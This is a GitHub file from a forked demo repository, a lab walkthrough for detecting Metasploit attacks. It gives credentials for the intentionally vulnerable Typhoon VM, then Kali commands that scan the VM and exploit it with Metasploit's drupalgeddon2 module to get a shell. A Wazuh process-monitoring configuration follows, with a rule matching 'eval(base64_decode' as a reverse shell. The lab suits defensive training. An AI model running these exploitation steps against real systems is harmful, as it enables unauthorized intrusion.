forked from OpenSecureCo/Demos
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Detect Metasploit Attacks
84 lines (51 loc) · 1.7 KB
/
Detect Metasploit Attacks
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
Link for Typhoon VM OVA: https://www.vulnhub.com/entry/typhoon-102,267/
Username: typhoon
password: 789456123
su - admin
password: metallica
sudo /bin/bash
password: metallica
Kali Linux Download: https://www.kali.org/get-kali/
##################### Kali Linux #####################################
nmap -sV *IP of Typhoon*
dirb http://*IP of Typhoon*/
msfconsole
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts *IP of Typhoon*
set targeturi drupal/
show options
exploit
shell
python -c 'import pty; pty.spawn("/bin/bash")'
##################### Typhoon Server ######################
ps -eo user,pid,cmd | grep www-data
##################### Wazuh Manager ###################################
nano /var/ossec/etc/shared/default/agent.conf
<wodle name="command">
<disabled>no</disabled>
<tag>ps-list</tag>
<command>ps -eo user,pid,cmd</command>
<interval>10s</interval>
<ignore_output>no</ignore_output>
<run_on_start>yes</run_on_start>
<timeout>5</timeout>
</wodle>
nano /var/ossec/etc/rules/local_rules.xml
<group name="commands,">
<rule id="100001" level="0">
<location>command_ps-list</location>
<description>List of running process.</description>
<group>process_monitor,</group>
</rule>
<rule id="100002" level="10">
<if_sid>100001</if_sid>
<match>eval(base64_decode</match>
<description>Reverse shell detected.</description>
<group>process_monitor,attacks</group>
</rule>
</group>
systemctl restart wazuh-manager
################ Wazuh Agent #########################
echo -e "wazuh_command.remote_commands=1" >> /var/ossec/etc/local_internal_options.conf
service wazuh-agent restart